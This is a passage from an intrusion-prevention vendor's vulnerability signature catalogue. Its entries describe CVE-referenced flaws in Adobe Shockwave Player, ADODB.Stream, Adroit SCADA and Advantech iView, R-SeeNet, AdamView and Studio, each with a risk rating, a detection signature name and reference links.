Buffer Overflow

Description:

A code execution vulnerability exists in Adobe Shockwave Player.

Situation:

HTTP_SS-Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
File-RIFF_Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow

References:

CVE-2010-3655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3655

BID-44516
http://www.securityfocus.com/bid/44516

Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

Malfunction

Description:

There is a code execution vulnerability in Adobe Shockwave player. The vulnerability is due to insufficient sanitation while parsing an offset value in PAMI record of a Director file. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SS-Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
File-RIFF_Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption

References:

CVE-2010-2872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2872

BID-42679
http://www.securityfocus.com/bid/42679

Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Out-Of-Bounds-Array-Indexing

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Adobe Shockwave Player. The vulnerability is due to an error while parsing crafted data in an rcsL RIFF chunk of a DIR file. An attacker can exploit this vulnerability by enticing a user to process a malicious file, which can result in remote code execution under the security context of the current user.

Situation:

File-RIFF_Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Vulnerability

References:

CVE-2012-2031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2031

BID-53420
http://www.securityfocus.com/bid/53420

OSVDB-81750
http://www.osvdb.org/81750

Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Uninitialized-Object-Access

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Shockwave Player

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Adobe Shockwave Player. The vulnerability is due to an error while parsing crafted data in an rcsL RIFF chunk of a DIR file. An attacker can exploit this vulnerability by enticing a user to process a malicious file, which could result in remote code execution under the security context of the current user.

Situation:

File-RIFF_Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Vulnerability

References:

CVE-2012-2030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2030

BID-53420
http://www.securityfocus.com/bid/53420

OSVDB-81749
http://www.osvdb.org/81749

Adobe-Shockwave-Player-rcsL-Corruption

About this vulnerability:

A code execution vulnerability in Adobe Shockwave Player

Risk:

High

First detected in:

sgpkg-ips-401-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Systems Shockwave Player

Type:

Input Validation

Description:

There is a code execution vulnerability in Adobe Shockwave Player.

Situation:

HTTP_SS-Adobe-Shockwave-Player-rcsL-Corruption
File-RIFF_Adobe-Shockwave-Player-rcsL-Corruption

References:

CVE-2010-3653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3653

BID-44291
http://www.securityfocus.com/bid/44291

Adobe-ShockwavePlayer-DirectorFile-RecordParsing-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Systems Shockwave Player

Type:

Integer Overflow

Description:

A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to an integer overflow error while calculating the size value for heap memory allocation while parsing a FFFFFF88 record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user. In the case of an unsuccessful attack, the affected application may terminate abnormally.

Situation:

HTTP_SS-Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution

References:

CVE-2010-2876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2876

BID-46326
http://www.securityfocus.com/bid/46326

Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution

About this vulnerability:

A vulnerability in Adobe Systems Shockwave Player

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Systems Shockwave Player

Type:

Integer Overflow

Description:

Situation:

HTTP_SS-Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
File-RIFF_Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution

References:

CVE-2010-4192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4192

BID-46326
http://www.securityfocus.com/bid/46326

ADODB.Stream-ActiveX-Object-Local-Disk-Write

About this vulnerability:

ADODB.Stream ActiveX object allows write access to local file system

Risk:

High

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Data Access Components

Type:

Insecure Configuration

Description:

ADODB.Stream ActiveX object is designed to allow access to local files from browsed-based applications running in the local zone. However, when combined with other vulnerabilities or insecure browser configuration, this object may be accessed from the internet zone allowing unprivileged file write access to the local system. This weakness is exploited by malware.

Situation:

HTTP_ADODB.Stream-ActiveX-Object-Local-Disk-Write
File-Text_ADODB.Stream-ActiveX-Object-Local-Disk-Write

References:

BID-10514
http://www.securityfocus.com/bid/10514

Adroit-SCADA-Intelligence-Server-DoS

About this vulnerability:	A vulnerability in Adroit SCADA Intelligence Server
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Adroit SCADA Intelligence Server
Type:	Malfunction
Description:	There is a denial of service vulnerability in Adroit SCADA Intelligence Server
Situation:	Generic_CS-Adroit-SCADA-Intelligence-Server-DoS

Adsincontext

About this vulnerability:	AdsInContext
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	AdsInContext
Type:	Misconfiguration
Description:	AdsInContext is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Adsincontext

Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution

About this vulnerability:

A vulnerability in Advantech AdamView

Risk:

Moderate

First detected in:

sgpkg-ips-623-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech AdamView

Type:

Buffer Overflow

Description:

A stack-buffer overflow has been reported in Advantech ADAMView, a Supervisory Control and Data Acquisition software (SCADA) specifically designed for low-volume I/O environments. The vulnerability is due to insufficient validation of conditional bitmaps from a file. A remote attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file. This can lead to code execution in the context of the affected user.

Situation:

File-Binary_Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution

References:

CVE-2014-8386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8386

BID-71191
http://www.securityfocus.com/bid/71191

OSVDB-114843
http://www.osvdb.org/114843

Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution

About this vulnerability:

A vulnerability in Advantech AdamView

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech AdamView

Type:

Buffer Overflow

Description:

A remote code execution vulnerability has been reported in Advantech ADAMView, a Supervisory Control and Data Acquisition software (SCADA) specifically designed for low-volume I/O environments. The vulnerability is due to insufficient validation of display properties from a file. A remote attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file. This can lead to code execution in the context of the affected user.

Situation:

File-Binary_Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution

References:

CVE-2014-8386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8386

BID-71191
http://www.securityfocus.com/bid/71191

OSVDB-114843
http://www.osvdb.org/114843

Advantech-Domain-Focused-Configuration-Tool-DoS

About this vulnerability:	A vulnerability in Advantech Domain Focused Configuration Tool
Risk:	Moderate
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech Domain Focused Configuration Tool
Type:	Malfunction
Description:	There is a denial of service vulnerability in Advantech Domain Focused Configuration Tool
Situation:	Generic_SS-Advantech-Domain-Focused-Configuration-Tool-DoS

Advantech-Iview-Commandservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1360-5242

Last changed:

sgpkg-ips-1360-5242

Platform:

Generic

Software:

Advantech iView

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the Advantech iView. Successful exploitation could lead in the disclosure of sensitive information.

Situation:

HTTP_CRL-Advantech-Iview-Commandservlet-Directory-Traversal

References:

CVE-2021-22656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22656

Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1515-5242

Last changed:

sgpkg-ips-1515-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

Improper validation of the column_value parameter in the ConfigurationServlet of Advantech iView causes an SQL injection vulnerability which can allow an attacker to gain access to information on the target system.

Situation:

HTTP_CRL-Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection

References:

CVE-2022-3323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3323

Advantech-Iview-CVE-2022-2138-Denial-Of-Service

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1500-5242

Last changed:

sgpkg-ips-1500-5242

Platform:

Generic

Software:

Advantech iView

Type:

Malfunction

Description:

Improper parsing of HTTP requests causes a denial of service vulnerability in Advantech Iview.

Situation:

HTTP_CS-Advantech-Iview-CVE-2022-2138-Denial-Of-Service

References:

CVE-2022-2138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2138

Advantech-Iview-Deleteztpconfig-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1362-5242

Last changed:

sgpkg-ips-1362-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in the Advantech iView. Successful exploitation could lead in arbitrary SQL statements.

Situation:

HTTP_CSU-Advantech-Iview-Deleteztpconfig-SQL-Injection

References:

CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932

Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1324-5242

Last changed:

sgpkg-ips-1324-5242

Platform:

Generic

Software:

Advantech iView

Type:

Directory Traversal

Description:

There exists a vulnerability in Advantech iView, versions prior to 5.7.02.5992, which allows remote attackers to execute arbitrary code due to the insufficient validation of user supplied paths before use in exportInventoryTable method.

Situation:

HTTP_CRL-Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal

References:

CVE-2020-16245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16245

Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Advantech iView

Type:

Directory Traversal

Description:

Improper validation of user-supplied paths before using in exportTaskMgrReport method causes a directory traversal vulnerability in Advantech iView. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal

References:

CVE-2020-16245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16245

Advantech-Iview-exportInventoryTable-Sort-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1494-5242

Last changed:

sgpkg-ips-1494-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the sortname and sortorder parameters in the exportInventoryTable process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

HTTP_CRL-Advantech-Iview-exportInventoryTable-Sort-SQL-Injection

References:

CVE-2022-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2136

Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1493-5242

Last changed:

sgpkg-ips-1493-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the segment parameter in the findCfgDeviceList process. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection or, in the worst case, remote code execution in the context of SYSTEM.

Situation:

HTTP_CRL-Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection

References:

CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135

Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech iView.

Risk:

High

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1487-5242

Platform:

Generic

Software:

Advantech iView

Type:

Directory Traversal

Description:

A vulnerability in Advantech iView, versions prior to 5.7.04.6469, which allows remote attackers to create files and potentially execute code by sending a crafted request to the target server, due to validation of user-supplied path before using in findCfgDeviceListDetailsExport method.

Situation:

HTTP_CSU-Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal

References:

CVE-2022-2139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2139

Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView.

Risk:

High

First detected in:

sgpkg-ips-1499-5242

Last changed:

sgpkg-ips-1499-5242

Platform:

Generic

Software:

Advantech iView

Type:

SQL Injection

Description:

A vulnerability in Advantech iView, versions prior to 5.7.04.6469, which allows remote attackers to execute arbitrary SQL commands by sending a crafted request to the target server, due to improper input validation for the sort_field and sort_type parameters in the findTaskMgrItems process.

Situation:

HTTP_CRL-Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection

References:

CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135

Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1486-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

Improper input validation for the search_date_from and search_date_to parameters in the getAllActiveTraps process causes an SQL injection vulnerability in Advantech Iview. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection

References:

CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135

Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1488-5242

Last changed:

sgpkg-ips-1488-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

Improper input validation for the sortname and sortorder in the getInventoryReportData process causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL on the target.

Situation:

HTTP_CRL-Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2

References:

CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135

Advantech-Iview-getInventoryReportData-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in the Advantech iView, versions prior to 5.7.03.6182, which allows remote attackers to execute arbitrary SQL statements, due to the lack of input validation in the getInventoryReportData method in the NetworkServlet Java class.

Situation:

HTTP_CSU-Advantech-Iview-getInventoryReportData-SQL-Injection

References:

CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932

Advantech-Iview-Getpsinventoryinfo-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

Improper validation of user-supplied input in getPSInventoryInfo of the NetworkServlet Java class causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL statements on the target.

Situation:

HTTP_CRL-Advantech-Iview-Getpsinventoryinfo-SQL-Injection

References:

CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932

Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection

About this vulnerability:

A vulnerability in Advantech iView.

Risk:

High

First detected in:

sgpkg-ips-1494-5242

Last changed:

sgpkg-ips-1494-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

A vulnerability in Advantech iView, versions before 5.7.04.6469, which allows remote attackers to execute arbitrary commands by sending crafted requests, due to improper input validation of the backup_filename parameter while updating NetworkServlet database.

Situation:

HTTP_CRL-Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection

References:

CVE-2022-2143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2143

Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1318-5242

Last changed:

sgpkg-ips-1318-5242

Platform:

Generic

Software:

Advantech iView

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Advantech iView. The vulnerability is due to improper validation of user-supplied path before using in exportPSInventoryTable method. A remote attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation of this vulnerability could lead to arbitrary file creation and potential for code execution on the affected system with privileges of SYSTEM.

Situation:

HTTP_CRL-Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal

References:

CVE-2020-16245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16245

Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1359-5242

Last changed:

sgpkg-ips-1359-5242

Platform:

Generic

Software:

Advantech iView

Type:

Malfunction

Description:

A remote command execution has been reported in Advantech iView. The vulnerability is due to improper input sanitization. A remote user could exploit the vulnerability by sending a crafted request to the server. Successful exploitation can result in execution of arbitrary code in the context of System user.

Situation:

HTTP_CRL-Advantech-Iview-Runproviewupgrade-Handling-Remote-Command-Injection

References:

CVE-2021-32930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32930

Advantech-Iview-Setdeviceauthentication-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1374-5242

Last changed:

sgpkg-ips-1374-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

A SQL injection vulnerability exists in Advantech iView. The vulnerability is due to improper validation of user-supplied input when processing the request in setDeviceAuthentication method of the NetworkServlet Java class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of arbitrary SQL statements, which may cause disclosure of sensitive information or authentication bypass, leading to further compromises.

Situation:

HTTP_CRL-Advantech-Iview-Setdeviceauthentication-SQL-Injection

References:

CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932

Advantech-Iview-Set_Useraccount-Username-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1496-5242

Last changed:

sgpkg-ips-1496-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

Improper input validation for the UserName parameter in the set_useraccount process causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Advantech-Iview-Set_Useraccount-Username-SQL-Injection

References:

CVE-2022-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2136

Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

Moderate

First detected in:

sgpkg-ips-1487-5242

Last changed:

sgpkg-ips-1487-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

Improper input validation for the ipaddress parameter during the updatePROMFile process causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Advantech-Iview-Updatepromfile-Ipaddress-SQL-Injection

References:

CVE-2022-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2136

Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1486-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the ID parameter in the updateSegmentInfo process. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.

Situation:

HTTP_CRL-Advantech-Iview-Updatesegmentinfo-Id-SQL-Injection

References:

CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135

Advantech-Iview-UserServlet-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

There exists a vulnerability in Advantech iView, versions prior to 5.7.03.6112, which allows remote attackers to execute arbitrary code due to the insufficient validation of user supplied input when processing the request in UserServlet Java class.

Situation:

HTTP_CRL-Advantech-Iview-UserServlet-SQL-Injection

References:

CVE-2021-22658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22658

Advantech-Iview-Ztpconfigtable-SQL-Injection

About this vulnerability:

A vulnerability in Advantech iView

Risk:

High

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

Advantech iView

Type:

Input Validation

Description:

A SQL injection vulnerability exists in the Advantech iView. The vulnerability is due to improper validation of user-supplied input when processing the request in ZTPConfigTable Java class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the execution of arbitrary SQL statements, which may cause disclosure of sensitive information, authentication bypass or disclosure of sensitive information, leading to further compromises.

Situation:

HTTP_CRL-Advantech-Iview-Ztpconfigtable-SQL-Injection

References:

CVE-2021-22654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22654

Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1373-5242

Last changed:

sgpkg-ips-1373-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

Improper validation of user-sent input in device_graph_page.php causes a cross-site scripting vulnerability in Advantech R-SeeNet. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Advantech-r-Seenet-Device_Graph_Page-Cross-Site-Scripting

References:

CVE-2021-21801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21801

Advantech-r-Seenet-Device_List-SQL-Injection

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1412-5242

Last changed:

sgpkg-ips-1412-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

Improper input validation of the 'desc_filter' parameter in device_list.php in Advantech R-SeeNet allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Advantech-r-Seenet-Device_List-SQL-Injection

References:

CVE-2021-21924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21924

Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

High

First detected in:

sgpkg-ips-1297-5242

Last changed:

sgpkg-ips-1297-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Advantech R-SeeNet. The vulnerability is due to insufficient validation on the device_id parameter within device_position.php. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in disclosing sensitive information.

Situation:

HTTP_CRL-Advantech-r-Seenet-Device_Position-Device_Id-SQL-Injection

References:

CVE-2020-25157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25157

Advantech-R-Seenet-Device_status.php-Local-File-Inclusion

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1634-5242

Last changed:

sgpkg-ips-1634-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

A local file inclusion vulnerability has been reported for Advantech R-SeeNet. The vulnerability is due to improper validation of the sub_stat parameter in the device_status.php. A remote authenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could allow a user to access some .php files which are normally restricted from the user. This could lead to privilege escalation and possible further compromises.

Situation:

HTTP_CRL-Advantech-R-Seenet-Device_status.php-Local-File-Inclusion

References:

CVE-2023-3256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3256

Advantech-r-Seenet-Out.PHP-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Directory Traversal

Description:

Improper validation of input data causes a directory traversal vulnerability in out.php in Advantech R-SeeNet. A successful exploit allows an attacker to access and delete files on the target system.

Situation:

HTTP_CRL-Advantech-r-Seenet-Out.PHP-Directory-Traversal

References:

CVE-2022-3387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3387

Advantech-r-Seenet-Ping.PHP-Command-Injection

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1375-5242

Last changed:

sgpkg-ips-1375-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

Improper validation of the input to ping.php causes a vulnerability in Advantech R-SeeNet. A successful exploit allows an attacker to execute arbitrary code on the target with the privileges of the target process.

Situation:

HTTP_CRL-Advantech-r-Seenet-Ping.PHP-Command-Injection

References:

CVE-2021-21805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805

Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1382-5242

Last changed:

sgpkg-ips-1382-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

Improper input validation in ssh_form.php causes a cross-site scripting vulnerability in Advantech R-SeeNet. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Advantech-r-Seenet-SSH_Form-Cross-Site-Scripting

References:

CVE-2021-21800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800

Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Advantech R-SeeNet

Risk:

Moderate

First detected in:

sgpkg-ips-1386-5242

Last changed:

sgpkg-ips-1386-5242

Platform:

Generic

Software:

Advantech R-SeeNet

Type:

Input Validation

Description:

Improper input validation in telnet_form.php causes a cross-site scripting vulnerability in Advantech r-Seenet. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Advantech-r-Seenet-Telnet_Form-Cross-Site-Scripting

References:

CVE-2021-21799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799

Advantech-Studio-ISSymbol-ActiveX-Control-Multiple-Buffer-Overflows

About this vulnerability:

A vulnerability in Advantech Studio

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech Studio

Type:

Malfunction

Description:

There are multiple buffer overflow vulnerabilities the ISSYmbol.ocx ActiveX control in Advantech Studio which allows remote attacker to execute arbitrary code.

Situation:

File-Text_Advantech-Studio-ISSymbol-ActiveX-Control-Buffer-Overflow

References:

CVE-2011-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340

BID-47596
http://www.securityfocus.com/bid/47596

